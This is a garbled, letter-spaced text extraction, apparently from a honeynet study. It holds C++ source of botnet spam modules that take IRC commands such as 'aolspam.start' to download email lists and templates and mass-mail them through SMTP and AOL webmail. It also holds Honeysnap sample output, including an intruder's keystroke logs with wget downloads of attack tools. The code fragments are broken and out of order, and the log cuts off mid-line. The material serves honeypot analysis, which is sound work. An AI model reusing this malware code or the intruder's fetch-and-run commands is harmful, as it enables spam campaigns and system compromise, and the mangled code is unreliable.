h ( . . . ){ # e n d i f / /B l a } } v o i dC S M T P _ L o g i c : : S e t T e m p l a t e ( C S t r i n g& s U R L ; ){ t r y{ u r lu U R L ; C D o w n l o a d H e l p e r* p D l d H l p = n e wC D o w n l o a d H e l p e r ; i f ( ! P a r s e U R L ( s U R L ,& u U R L ; ) )r e t u r n ; p D l d H l p > m _ s H o s t . A s s i g n ( u U R L . s H o s t ) ;p D l d H l p > m _ s P a t h . A s s i g n ( u U R L . s R e q ) ; p D l d H l p > m _ s T a r g e t . A s s i g n ( " t e m p l a t e . t m p " ) ;p D l d H l p > m _ s R e p l y T o . A s s i g n ( " " ) ; p D l d H l p > m _ b E x e c u t e = f a l s e ;p D l d H l p > m _ b U p d a t e = f a l s e ;p D l d H l p > m _ b F T P = f a l s e ; p D l d H l p > m _ b S i l e n t = t r u e ;p D l d H l p > m _ b N o t i c e = f a l s e ;p D l d H l p > m _ b J o i n = f a l s e ; p D l d H l p > R u n ( ) ;d e l e t ep D l d H l p ; F I L E* f p = f o p e n ( " t e m p l a t e . t m p " ," r b " ) ; i f ( ! f p )r e t u r n ; i n ti F i l e S i z e = G e t F i l e S i z e ( f p ) ; c h a r* s z T e m p l a t e = n e wc h a r [ i F i l e S i z e + 1 ] ; m e m s e t ( s z T e m p l a t e ,0 ,i F i l e S i z e + 1 ) ; w h i l e ( ! f e o f ( f p ) ){ f g e t s ( s z T e m p l a t e ,i F i l e S i z e ,f p ) ; C S t r i n gs T e m p l a t e ( s z T e m p l a t e ) ; i f ( s T e m p l a t e . F i n d ( ' \ r ' ,0 ) ){ s T e m p l a t e [ s T e m p l a t e . F i n d ( ' \ r ' ,0 ) 1 ] = ' \ 0 ' ; } i f ( s T e m p l a t e . F i n d ( ' \ n ' ,0 ) ){ s T e m p l a t e [ s T e m p l a t e . F i n d ( ' \ n ' ,0 ) 1 ] = ' \ 0 ' ; } i f ( ! s T e m p l a t e . M i d ( 0 ,4 ) . C o m p a r e ( " d a t a " ) )b r e a k ; i f ( ! s T e m p l a t e . T o k e n ( 0 ,"" ) . C o m p a r e ( " f r o m " ) ){ m _ s E m a i l S r c . A s s i g n ( s T e m p l a t e . T o k e n ( 1 ,"" ,t r u e ) ) ; } i f ( ! s T e m p l a t e . T o k e n ( 0 ,"" ) . C o m p a r e ( " f r o m _ f u l l " ) ){ m _ s E m a i l S r c F u l l . A s s i g n ( s T e m p l a t e . T o k e n ( 1 ,"" ,t r u e ) ) ; } i f ( ! s T e m p l a t e . T o k e n ( 0 ,"" ) . C o m p a r e ( " s u b j e c t " ) ){ m _ s S u b j e c t . A s s i g n ( s T e m p l a t e . T o k e n ( 1 ,"" ,t r u e ) ) ; } } C S t r i n gs D a t a T m p ( " " ) ; w h i l e ( ! f e o f ( f p ) ){ f g e t s ( s z T e m p l a t e ,i F i l e S i z e ,f p ) ; C S t r i n gs T e m p l a t e ( s z T e m p l a t e ) ; i f ( s T e m p l a t e . F i n d ( ' \ r ' ,0 ) ){ s T e m p l a t e [ s T e m p l a t e . F i n d ( ' \ r ' ,0 ) 1 ] = ' \ 0 ' ; } i f ( s T e m p l a t e . F i n d ( ' \ n ' ,0 ) ){ s T e m p l a t e [ s T e m p l a t e . F i n d ( ' \ n ' ,0 ) 1 ] = ' \ 0 ' ; } s D a t a T m p . A p p e n d ( s T e m p l a t e ) ;s D a t a T m p . A p p e n d ( " \ r \ n " ) ; }

m _ s D a t a . A s s i g n ( s D a t a T m p ) ; m _ s E m a i l T e m p l a t e . A s s i g n ( " " ) ; d e l e t e[ ]s z T e m p l a t e ;f c l o s e ( f p ) ; D e l e t e F i l e ( " t e m p l a t e . t m p " ) ; m _ b T e m p l a t e S e t = t r u e ; # i f d e fP t W 3 2 C a t c h A l l }P t W 3 2 C a t c h A l l{ # e l s e }c a t c h ( . . . ){ # e n d i f / /B l a } } v o i d* C S M T P _ L o g i c : : R u n ( ){ r e t u r nN U L L ; w h i l e ( t r u e ){ t r y{ i n ti N u m T h r e a d s = s p a m _ m a x t h r e a d s . i V a l u e ; C S M T P _ S e n d e r* p S e n d e r s = n e wC S M T P _ S e n d e r [ i N u m T h r e a d s ] ; / /S p a ml o o p w h i l e ( m _ b S p a m m i n g& &m _ b T e m p l a t e S e t ){ / /L o o pt h r o u g ha l la v a i l a b l et h r e a d s f o r ( i n ti = 0 ;i < 1 ){ S e t L i s t ( m _ s L i s t U R L ) ;S l e e p ( 1 0 0 0 ) ;} / /G e tt h ev a l u e s C S t r i n gs E m a i l S r c = m _ s E m a i l S r c ; C S t r i n gs E m a i l S r c F u l l = m _ s E m a i l S r c F u l l ; C S t r i n gs E m a i l A d d r e s s = m _ l E m a i l s . f r o n t ( ) ;m _ l E m a i l s . p o p _ f r o n t ( ) ; C S t r i n gs S u b j e c t = m _ s S u b j e c t ; C S t r i n gs D a t a = m _ s D a t a ; C S t r i n gs S M T P H o s t = s E m a i l A d d r e s s . T o k e n ( 1 ," @ " ) ; / /R e s o l v et h eM X C D N Sc D N S ;C S t r i n gs D N S = c D N S . R e s o l v e M X ( s S M T P H o s t . C S t r ( ) ) ; / /F a l lb a c kt oAr e c o r di nc a s et h i sf a i l e d i f ( ! s D N S . C o m p a r e ( " " ) )s D N S . A s s i g n ( s S M T P H o s t ) ; i f ( p S e n d e r s [ i ] . m _ b F i n i s h e d ){ p S e n d e r s [ i ] . S e t M a i l ( s E m a i l S r c ,s E m a i l S r c F u l l ,s E m a i l A d d r e s s ,s S u b j e c t ,s D a t a ) ; p S e n d e r s [ i ] . S e t S e r v e r ( s D N S ,2 5 ) ;p S e n d e r s [ i ] . S t a r t ( f a l s e ) ; } } } d e l e t e[ ]p S e n d e r s ;S l e e p ( 2 0 0 0 ) ; # i f d e fP t W 3 2 C a t c h A l l }P t W 3 2 C a t c h A l l{ # e l s e }c a t c h ( . . . ){ # e n d i f / /B l a } } r e t u r nN U L L ; } C A O L _ L o g i c : : C A O L _ L o g i c ( ){ m _ s z T y p e = " C A O L _ L o g i c " ; m _ l E m a i l s . c l e a r ( ) ;m _ s E m a i l T e m p l a t e . A s s i g n ( " " ) ;m _ b S p a m m i n g = f a l s e ;m _ b T e m p l a t e S e t = f a l s e ; } C A O L _ L o g i c : : ~ C A O L _ L o g i c ( ){ m _ l E m a i l s . c l e a r ( ) ;m _ s E m a i l T e m p l a t e . A s s i g n ( " " ) ;m _ b S p a m m i n g = f a l s e ;m _ b T e m p l a t e S e t = f a l s e ; } v o i dC A O L _ L o g i c : : I n i t ( ){ R E G C M D ( m _ c m d S e t L i s t , R E G C M D ( m _ c m d S e t T e m p l a t e , R E G C M D ( m _ c m d S e t U s e r , R E G C M D ( m _ c m d S e t P a s s , R E G C M D ( m _ c m d S t a r t , R E G C M D ( m _ c m d S t o p , R E G C V A R ( a o l s p a m _ m a x t h r e a d s , } b o o lC A O L _ L o g i c : : H a n d l e C o m m a n d ( C M e s s a g e* p M s g ){ i f ( ! p M s g > s C m d . C o m p a r e ( " a o l s p a m . s e t l i s t " ) ){ m _ s L i s t U R L . A s s i g n ( p M s g > s C h a t S t r i n g . T o k e n ( 1 ,"" ) ) ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " D o w n l o a d i n gn e we m a i ll i s t . " ,p M s g > s R e p l y T o . S t r ( ) ) ; S e t L i s t ( m _ s L i s t U R L ) ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " F i n i s h e dd o w n l o a d i n gn e we m a i ll i s t . " ,p M s g > s R e p l y T o . S t r ( ) ) ; r e t u r nt r u e ; } e l s ei f ( ! p M s g > s C m d . C o m p a r e ( " a o l s p a m . s e t t e m p l a t e " ) ){ m _ s T e m p l a t e U R L . A s s i g n ( p M s g > s C h a t S t r i n g . T o k e n ( 1 ,"" ) ) ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " D o w n l o a d i n gn e we m a i lt e m p l a t e . " ,p M s g > s R e p l y T o . S t r ( ) ) ; S e t T e m p l a t e ( m _ s T e m p l a t e U R L ) ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " a o l s p a m . s e t l i s t " , " a o l s p a m . s e t t e m p l a t e " , " a o l s p a m . s e t u s e r " , " a o l s p a m . s e t p a s s " , " a o l s p a m . s t a r t " , " a o l s p a m . s t o p " , " 8 " , " a o l-d o w n l o a d sa ne m a i ll i s t " , " a o l-d o w n l o a d sa ne m a i lt e m p l a t e " , " a o l-s e t sa nu s e r n a m e " , " a o l-s e t sap a s s w o r d " , " a o l-s t a r t st h es p a m m i n g " , " a o l-s t o p st h es p a m m i n g " , f a l s e , 0 ) ; f a l s e , f a l s e , f a l s e , f a l s e , f a l s e , f a l s e , t h i s ) ; t h i s ) ; t h i s ) ; t h i s ) ; t h i s ) ; t h i s ) ;

" A O LS p a mL o g i c-N u m b e ro ft h r e a d s " ,

" F i n i s h e dd o w n l o a d i n gn e we m a i lt e m p l a t e . " ,p M s g > s R e p l y T o . S t r ( ) ) ; r e t u r nt r u e ; } i f ( ! p M s g > s C m d . C o m p a r e ( " a o l s p a m . s e t u s e r " ) ){ S e t U s e r ( p M s g > s C h a t S t r i n g . T o k e n ( 1 ,"" ) ) ; r e t u r nt r u e ; } e l s ei f ( ! p M s g > s C m d . C o m p a r e ( " a o l s p a m . s e t p a s s " ) ){ S e t P a s s w o r d ( p M s g > s C h a t S t r i n g . T o k e n ( 1 ,"" ) ) ; r e t u r nt r u e ; } e l s ei f ( ! p M s g > s C m d . C o m p a r e ( " a o l s p a m . s t a r t " ) ){ m _ b S p a m m i n g = t r u e ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " S t a r t e ds p a m m i n g . " ,p M s g > s R e p l y T o . S t r ( ) ) ; r e t u r nt r u e ; } e l s ei f ( ! p M s g > s C m d . C o m p a r e ( " a o l s p a m . s t o p " ) ){ m _ b S p a m m i n g = f a l s e ; g _ p M a i n C t r l > m _ c I R C . S e n d M s g ( p M s g > b S i l e n t ,p M s g > b N o t i c e ,\ " S t o p p e ds p a m m i n g . " ,p M s g > s R e p l y T o . S t r ( ) ) ; r e t u r nt r u e ; } r e t u r nf a l s e ; } v o i dC A O L _ L o g i c : : S e t L i s t ( C S t r i n g& s U R L ; ){ t r y{ u r lu U R L ; C D o w n l o a d H e l p e r* p D l d H l p = n e wC D o w n l o a d H e l p e r ; i f ( ! P a r s e U R L ( s U R L ,& u U R L ; ) )r e t u r n ; p D l d H l p > m _ s H o s t . A s s i g n ( u U R L . s H o s t ) ;p D l d H l p > m _ s P a t h . A s s i g n ( u U R L . s R e q ) ; p D l d H l p > m _ s T a r g e t . A s s i g n ( " l i s t . t m p " ) ;p D l d H l p > m _ s R e p l y T o . A s s i g n ( " " ) ; p D l d H l p > m _ b E x e c u t e = f a l s e ;p D l d H l p > m _ b U p d a t e = f a l s e ;p D l d H l p > m _ b F T P = f a l s e ; p D l d H l p > m _ b S i l e n t = t r u e ;p D l d H l p > m _ b N o t i c e = f a l s e ;p D l d H l p > m _ b J o i n = f a l s e ; p D l d H l p > R u n ( ) ;d e l e t ep D l d H l p ; F I L E* f p = f o p e n ( " l i s t . t m p " ," r b " ) ; i f ( ! f p )r e t u r n ; i n ti F i l e S i z e = G e t F i l e S i z e ( f p ) ; c h a r* s z L i s t = n e wc h a r [ i F i l e S i z e + 1 ] ; m e m s e t ( s z L i s t ,0 ,i F i l e S i z e + 1 ) ; f r e a d ( s z L i s t ,s i z e o f ( c h a r ) ,i F i l e S i z e ,f p ) ; C S t r i n gs L i s t ( s z L i s t ) ;c h a r* s z L i s t C o p y = s L i s t . S t r ( ) ,* s z T e m p ; w h i l e ( t r u e ){ c h a r* s z C R L F = s t r s t r ( s z L i s t C o p y ," \ r " ) ; i f ( ! s z C R L F )s z C R L F = s t r s t r ( s z L i s t C o p y ," \ n " ) ; i f ( ! s z C R L F )b r e a k ; w h i l e ( * s z C R L F = = ' \ r ' ){* s z C R L F = ' \ 0 ' ;s z C R L F + + ;} w h i l e ( * s z C R L F = = ' \ n ' ){* s z C R L F = ' \ 0 ' ;s z C R L F + + ;} w h i l e ( * s z C R L F = = ' \ r ' ){* s z C R L F = ' \ 0 ' ;s z C R L F + + ;} c h a r* s z T o k e n = s z L i s t C o p y ;s z L i s t C o p y = s z C R L F ; i f ( ! s t r c m p ( s z T o k e n ," " ) )c o n t i n u e ; m _ l E m a i l s . p u s h _ b a c k ( C S t r i n g ( s z T o k e n ) ) ; } d e l e t e[ ]s z L i s t ;f c l o s e ( f p ) ; D e l e t e F i l e ( " l i s t . t m p " ) ; # i f d e fP t W 3 2 C a t c h A l l }P t W 3 2 C a t c h A l l{ # e l s e }c a t c h ( . . . ){ # e n d i f / /B l a } } v o i dC A O L _ L o g i c : : S e t T e m p l a t e ( C S t r i n g& s U R L ; ){ t r y{ u r lu U R L ; C D o w n l o a d H e l p e r* p D l d H l p = n e wC D o w n l o a d H e l p e r ; i f ( ! P a r s e U R L ( s U R L ,& u U R L ; ) )r e t u r n ; p D l d H l p > m _ s H o s t . A s s i g n ( u U R L . s H o s t ) ;p D l d H l p > m _ s P a t h . A s s i g n ( u U R L . s R e q ) ; p D l d H l p > m _ s T a r g e t . A s s i g n ( " t e m p l a t e . t m p " ) ;p D l d H l p > m _ s R e p l y T o . A s s i g n ( " " ) ; p D l d H l p > m _ b E x e c u t e = f a l s e ;p D l d H l p > m _ b U p d a t e = f a l s e ;p D l d H l p > m _ b F T P = f a l s e ; p D l d H l p > m _ b S i l e n t = t r u e ;p D l d H l p > m _ b N o t i c e = f a l s e ;p D l d H l p > m _ b J o i n = f a l s e ; p D l d H l p > R u n ( ) ;d e l e t ep D l d H l p ; F I L E* f p = f o p e n ( " t e m p l a t e . t m p " ," r b " ) ; i f ( ! f p )r e t u r n ; i n ti F i l e S i z e = G e t F i l e S i z e ( f p ) ; c h a r* s z T e m p l a t e = n e wc h a r [ i F i l e S i z e + 1 ] ; m e m s e t ( s z T e m p l a t e ,0 ,i F i l e S i z e + 1 ) ; w h i l e ( ! f e o f ( f p ) ){ f g e t s ( s z T e m p l a t e ,i F i l e S i z e ,f p ) ; C S t r i n gs T e m p l a t e ( s z T e m p l a t e ) ; i f ( s T e m p l a t e . F i n d ( ' \ r ' ,0 ) ){

s T e m p l a t e [ s T e m p l a t e . F i n d ( ' \ r ' ,0 ) 1 ] = ' \ 0 ' ; } i f ( s T e m p l a t e . F i n d ( ' \ n ' ,0 ) ){ s T e m p l a t e [ s T e m p l a t e . F i n d ( ' \ n ' ,0 ) 1 ] = ' \ 0 ' ; } i f ( ! s T e m p l a t e . M i d ( 0 ,4 ) . C o m p a r e ( " d a t a " ) )b r e a k ; i f ( ! s T e m p l a t e . T o k e n ( 0 ,"" ) . C o m p a r e ( " f r o m " ) ){ m _ s E m a i l S r c . A s s i g n ( s T e m p l a t e . T o k e n ( 1 ,"" ,t r u e ) ) ; } i f ( ! s T e m p l a t e . T o k e n ( 0 ,"" ) . C o m p a r e ( " f r o m _ f u l l " ) ){ m _ s E m a i l S r c F u l l . A s s i g n ( s T e m p l a t e . T o k e n ( 1 ,"" ,t r u e ) ) ; } i f ( ! s T e m p l a t e . T o k e n ( 0 ,"" ) . C o m p a r e ( " s u b j e c t " ) ){ m _ s S u b j e c t . A s s i g n ( s T e m p l a t e . T o k e n ( 1 ,"" ,t r u e ) ) ; } } C S t r i n gs D a t a T m p ( " " ) ; w h i l e ( ! f e o f ( f p ) ){ f g e t s ( s z T e m p l a t e ,i F i l e S i z e ,f p ) ; C S t r i n gs T e m p l a t e ( s z T e m p l a t e ) ; i f ( s T e m p l a t e . F i n d ( ' \ r ' ,0 ) ){ s T e m p l a t e [ s T e m p l a t e . F i n d ( ' \ r ' ,0 ) 1 ] = ' \ 0 ' ; } i f ( s T e m p l a t e . F i n d ( ' \ n ' ,0 ) ){ s T e m p l a t e [ s T e m p l a t e . F i n d ( ' \ n ' ,0 ) 1 ] = ' \ 0 ' ; } s D a t a T m p . A p p e n d ( s T e m p l a t e ) ;s D a t a T m p . A p p e n d ( " \ r \ n " ) ; } m _ s D a t a . A s s i g n ( s D a t a T m p ) ; m _ s E m a i l T e m p l a t e . A s s i g n ( " " ) ; d e l e t e[ ]s z T e m p l a t e ;f c l o s e ( f p ) ; D e l e t e F i l e ( " t e m p l a t e . t m p " ) ; m _ b T e m p l a t e S e t = t r u e ; # i f d e fP t W 3 2 C a t c h A l l }P t W 3 2 C a t c h A l l{ # e l s e }c a t c h ( . . . ){ # e n d i f / /B l a } } v o i dC A O L _ L o g i c : : S e t U s e r ( C S t r i n g& s U s e r ; ){ m _ s U s e r . A s s i g n ( s U s e r ) ; } v o i dC A O L _ L o g i c : : S e t P a s s w o r d ( C S t r i n g& s P a s s ; ){ m _ s P a s s . A s s i g n ( s P a s s ) ; } v o i d* C A O L _ L o g i c : : R u n ( ){ r e t u r nN U L L ; w h i l e ( t r u e ){ t r y{ i n ti N u m T h r e a d s = a o l s p a m _ m a x t h r e a d s . i V a l u e ; C A O L W e b M a i l* p S e n d e r s = n e wC A O L W e b M a i l [ i N u m T h r e a d s ] ; / /S p a ml o o p w h i l e ( m _ b S p a m m i n g& &m _ b T e m p l a t e S e t ){ / /L o o pt h r o u g ha l la v a i l a b l et h r e a d s f o r ( i n ti = 0 ;i < 1 ){ S e t L i s t ( m _ s L i s t U R L ) ;S l e e p ( 1 0 0 0 ) ;} / /G e tt h ev a l u e s C S t r i n gs E m a i l S r c = m _ s E m a i l S r c ; C S t r i n gs E m a i l S r c F u l l = m _ s E m a i l S r c F u l l ; C S t r i n gs E m a i l A d d r e s s = m _ l E m a i l s . f r o n t ( ) ;m _ l E m a i l s . p o p _ f r o n t ( ) ; C S t r i n gs S u b j e c t = m _ s S u b j e c t ; C S t r i n gs D a t a = m _ s D a t a ; p S e n d e r s [ i ] . S e t M a i l ( s E m a i l S r c ,s E m a i l S r c F u l l ,s E m a i l A d d r e s s ,s S u b j e c t ,s D a t a ) ; p S e n d e r s [ i ] . S t a r t ( f a l s e ) ; } } d e l e t e[ ]p S e n d e r s ;S l e e p ( 2 0 0 0 ) ; # i f d e fP t W 3 2 C a t c h A l l }P t W 3 2 C a t c h A l l{ # e l s e }c a t c h ( . . . ){ # e n d i f / /B l a } } r e t u r nN U L L ; } C A O L W e b M a i l : : C A O L W e b M a i l ( ){m _ s z T y p e = " C A O L W e b M a i l " ;m _ b M a i l S e t = f a l s e ;m _ b F i n i s h e d = t r u e ;} C A O L W e b M a i l : : ~ C A O L W e b M a i l ( ){m _ b M a i l S e t = f a l s e ;m _ b F i n i s h e d = t r u e ;}

v o i d* C A O L W e b M a i l : : R u n ( ){ m _ b F i n i s h e d = f a l s e ; w h i l e ( ! m _ b M a i l S e t )S l e e p ( 1 0 0 0 ) ; S e n d ( ) ; m _ b F i n i s h e d = t r u e ; r e t u r nN U L L ; } v o i dC A O L W e b M a i l : : S e t M a i l ( C S t r i n gs M a i l F r o m ,C S t r i n gs M a i l F r o m F u l l ,\ C S t r i n gs R c p t T o ,C S t r i n gs S u b j e c t ,\ C S t r i n gs D a t a ){ m _ s M a i l F r o m = s M a i l F r o m ;m _ s M a i l F r o m F u l l = s M a i l F r o m F u l l ; m _ s R c p t T o = s R c p t T o ;m _ s S u b j e c t = s S u b j e c t ;m _ s D a t a = s D a t a ; m _ b M a i l S e t = t r u e ; }

Honeysnap sample output
P e r f o r m i n gi n i t i a la n a l y s i so fh o n e y w a l ll o g s ,p l e a s ew a i t . = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = D a t e :2 0 0 4 0 8 0 2 S p l i t t i n gd a t ai n t op c a pf i l e sf o re a c hh o n e y p o t ,p l e a s ew a i t( 2 0 0 4 0 8 0 2 ) : P o t :1 0 . 2 . 1 . 1 4 5[5 7 3 2E V E N T S] P o t :1 0 . 2 . 1 . 1 4 6[4 0 6 3 5E V E N T S] P o t :1 0 . 2 . 1 . 1 4 7[2 6 4 8E V E N T S] O u t b o u n dH T T PG E T st oT C Pp o r t8 0( 2 0 0 4 0 8 0 2 ) : P o t :1 0 . 2 . 1 . 1 4 5[0H T T PG E T s] P o t :1 0 . 2 . 1 . 1 4 6[1 0H T T PG E T s] 1 3 2 2 82 0 0 4 0 8 0 21 7 : 1 6 : 3 5 . 3 9 3 8 5 51 0 . 2 . 1 . 1 4 6>6 4 . 2 0 2 . X X X . X X XH T T PG E T/ x / q dH T T P / 1 . 0 1 6 1 9 12 0 0 4 0 8 0 22 0 : 1 0 : 3 6 . 6 7 7 4 7 91 0 . 2 . 1 . 1 4 6>6 4 . 2 0 2 . X X X . X X XH T T PG E T/ x / q dH T T P / 1 . 0 1 6 3 0 92 0 0 4 0 8 0 22 0 : 1 1 : 1 7 . 5 5 9 7 5 81 0 . 2 . 1 . 1 4 6>2 1 3 . 2 1 8 . X X X . X X XH T T PG E T/ A r h i v e / p . t a r . g zH T T P / 1 . 0 2 5 7 0 82 0 0 4 0 8 0 22 0 : 2 2 : 3 9 . 0 1 9 9 2 21 0 . 2 . 1 . 1 4 6>6 6 . 2 1 8 . X X X . X X XH T T PG E T/ s s l s t o p . t a r . g zH T T P / 1 . 0 2 5 8 1 52 0 0 4 0 8 0 22 0 : 2 2 : 5 3 . 3 3 7 1 6 21 0 . 2 . 1 . 1 4 6>2 1 3 . 2 1 8 . X X X . X X XH T T PG E T/ A r h i v e / p s y . t g zH T T P / 1 . 0 2 7 0 7 72 0 0 4 0 8 0 22 0 : 3 7 : 1 3 . 7 6 7 6 9 91 0 . 2 . 1 . 1 4 6>2 1 3 . 2 1 8 . X X X . X X XH T T PG E T/ A r h i v e / p i c o . t g zH T T P / 1 . 0 3 1 5 1 52 0 0 4 0 8 0 22 1 : 1 0 : 1 3 . 4 9 3 6 0 01 0 . 2 . 1 . 1 4 6>2 1 3 . 2 1 8 . X X X . X X XH T T PG E T/ A r h i v e / s o c k l i s t . t g zH T T P / 1 . 0 3 1 9 2 32 0 0 4 0 8 0 22 1 : 1 6 : 2 8 . 3 7 7 2 4 61 0 . 2 . 1 . 1 4 6>2 1 2 . 1 5 . X X X . X X XH T T PG E T/ c g i b i n / t e kH T T P / 1 . 0 3 2 1 6 82 0 0 4 0 8 0 22 1 : 2 3 : 0 9 . 8 1 8 2 7 51 0 . 2 . 1 . 1 4 6>2 1 3 . 2 1 8 . X X X . X X XH T T PG E T/ A r h i v e / m e c h . t g zH T T P / 1 . 0 P o t :1 0 . 2 . 1 . 1 4 7[0H T T PG E T s] F T PG E T st oT C Pp o r t2 0( 2 0 0 4 0 8 0 2 ) : P o t :1 0 . 2 . 1 . 1 4 5[0F T PG E T s] P o t :1 0 . 2 . 1 . 1 4 6[0F T PG E T s] P o t :1 0 . 2 . 1 . 1 4 7[0F T PG E T s] I R Cp r i v m s gm e s s a g e s( 2 0 0 4 0 8 0 2 ) : P o t :1 0 . 2 . 1 . 1 4 5[0I R Cm e s s a g e s] P o t :1 0 . 2 . 1 . 1 4 6[6 1 3I R Cm e s s a g e s] C N O T I C EE d e . N L . e u . e x a m p l e . o r gC N O T I C ES I L E N C E = 1 5M O D E S = 6M A X C H A N N E L S = 2 0N I C K L E N = 1 2M A X N I C K L E N = 1 5: a r es u p p o r t e db yt h i ss e r v e r # T h e E x a m p l eC r y s t a l ! ~ C a s e @ C r e a t u r e . u s e r s . e x a m p l e . o r gT a L e n T _n i c kM i r a b e l a # T h e E x a m p l eC r y s t a l ! ~ C a s e @ C r e a t u r e . u s e r s . e x a m p l e . o r gG e s T _n i c kM i r a b e l a # T h e E x a m p l eC r y s t a l ! ~ C a s e @ C r e a t u r e . u s e r s . e x a m p l e . o r g_ a L e n T _ _ _n i c kG a g i c a # T h e E x a m p l eC r y s t a l ! ~ C a s e @ C r e a t u r e . u s e r s . e x a m p l e . o r gG e s T _ _n i c kR o s c a t a # T h e E x a m p l eC r y s t a l ! ~ C a s e @ C r e a t u r e . u s e r s . e x a m p l e . o r gG e s T _ _ _n i c kM a i m u t a # T h e E x a m p l eC r y s t a l ! ~ C a s e @ C r e a t u r e . u s e r s . e x a m p l e . o r gG e s T _n i c kG a O z # T h e E x a m p l eC r y s t a l ! ~ C a s e @ C r e a t u r e . u s e r s . e x a m p l e . o r gT a L e n T _ _ _n i c kS a l b a t i c a # T h e E x a m p l eC r y s t a l ! ~ C a s e @ C r e a t u r e . u s e r s . e x a m p l e . o r gB e l e a _n i c kB r o n z a t a # T h e E x a m p l eC r y s t a l ! ~ C a s e @ C r e a t u r e . u s e r s . e x a m p l e . o r gB e l e a _ _ _n i c kC r e a t z a P o t :1 0 . 2 . 1 . 1 4 7[0I R Cm e s s a g e s] S e b e kk e y s t r o k el o g s( 2 0 0 4 0 8 0 2 ) : P o t :1 0 . 2 . 1 . 1 4 5[1 2S e b e kr e c o r d s] P o t :1 0 . 2 . 1 . 1 4 6[5 4S e b e kr e c o r d s] [ 2 0 0 4 0 8 0 21 5 : 2 3 : 1 6 [ 2 0 0 4 0 8 0 21 5 : 2 3 : 1 6 [ 2 0 0 4 0 8 0 21 8 : 1 7 : 1 8 [ 2 0 0 4 0 8 0 21 8 : 1 7 : 1 8 [ 2 0 0 4 0 8 0 21 8 : 1 7 : 3 4 [ 2 0 0 4 0 8 0 21 8 : 1 7 : 3 7 [ 2 0 0 4 0 8 0 21 8 : 1 7 : 4 3 [ 2 0 0 4 0 8 0 21 8 : 1 7 : 5 7 [ 2 0 0 4 0 8 0 21 8 : 2 8 : 0 9 [ 2 0 0 4 0 8 0 21 8 : 2 8 : 3 5 [ 2 0 0 4 0 8 0 21 8 : 2 8 : 4 2 [ 2 0 0 4 0 8 0 21 8 : 2 8 : 4 2 [ 2 0 0 4 0 8 0 21 8 : 2 8 : 4 4 [ 2 0 0 4 0 8 0 21 8 : 2 9 : 0 7 [ 2 0 0 4 0 8 0 21 8 : 2 9 : 1 6 [ 2 0 0 4 0 8 0 21 8 : 2 9 : 1 9 [ 2 0 0 4 0 8 0 21 8 : 2 9 : 1 9 [ 2 0 0 4 0 8 0 21 8 : 2 9 : 2 1 1 0 . 2 . 1 . 1 4 62 0 0 2 5b a s h / s h4 8 ] T E R d c f l = 1 0 . 2 . 1 . 1 4 62 0 0 2 5b a s h4 8 ] u n a m e ; 1 0 . 2 . 1 . 1 4 62 0 4 4 4b a s h / s h4 8 ] T E R m d b 1 0 . 2 . 1 . 1 4 62 0 4 4 4b a s h4 8 ] u n a m ; i 1 0 . 2 . 1 . 1 4 62 0 4 4 4b a s h4 8 ] c dt l s 1 0 . 2 . 1 . 1 4 62 0 4 4 4b a s h4 8 ] c dl s 1 0 . 2 . 1 . 1 4 62 0 4 4 4b a s h4 8 ] c d/ l s 1 0 . 2 . 1 . 1 4 62 0 4 4 4b a s h4 8 ] w g e t m t a r 1 0 . 2 . 1 . 1 4 62 0 4 7 3b a s h0 ] s o c k w g e t r t a r . / s e l s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] l s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] c d. v a r . t [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] / c a [ B S ] [ B S ] v a r / t m p 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] k s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] l s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] w g e t m s a 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] t a r t c ds t 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] . / s s 1 0 . 2 . 1 . 1 4 62 6 9 9 0s e n d m a i l0 ] l s c . v a r . t / c a v a r / t m p k s l s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] c d. .

[ 2 0 0 4 0 8 0 21 8 : 2 9 : 2 7 [ 2 0 0 4 0 8 0 21 8 : 3 2 : 2 6 [ 2 0 0 4 0 8 0 21 8 : 3 2 : 3 0 [ 2 0 0 4 0 8 0 21 8 : 3 3 : 1 9 [ 2 0 0 4 0 8 0 21 8 : 4 0 : 0 9 [ 2 0 0 4 0 8 0 21 8 : 4 0 : 3 2 [ 2 0 0 4 0 8 0 21 8 : 4 0 : 3 8 [ 2 0 0 4 0 8 0 21 8 : 5 7 : 1 0 [ 2 0 0 4 0 8 0 21 8 : 5 7 : 1 3 [ 2 0 0 4 0 8 0 21 8 : 5 7 : 1 5 [ 2 0 0 4 0 8 0 21 8 : 5 7 : 1 8 [ 2 0 0 4 0 8 0 21 8 : 5 7 : 1 9 [ 2 0 0 4 0 8 0 21 8 : 5 7 : 2 8 [ 2 0 0 4 0 8 0 21 9 : 1 1 : 4 1 [ 2 0 0 4 0 8 0 21 9 : 1 1 : 4 2 [ 2 0 0 4 0 8 0 21 9 : 1 2 : 0 4 [ 2 0 0 4 0 8 0 21 9 : 1 8 : 1 0 [ 2 0 0 4 0 8 0 21 9 : 1 8 : 1 3 [ 2 0 0 4 0 8 0 21 9 : 1 8 : 1 5 [ 2 0 0 4 0 8 0 21 9 : 1 8 : 1 8 [ 2 0 0 4 0 8 0 21 9 : 2 1 : 2 9 [ 2 0 0 4 0 8 0 21 9 : 2 1 : 5 0 [ 2 0 0 4 0 8 0 21 9 : 2 9 : 5 6 [ 2 0 0 4 0 8 0 21 9 : 3 0 : 3 1 [ 2 0 0 4 0 8 0 21 9 : 3 0 : 3 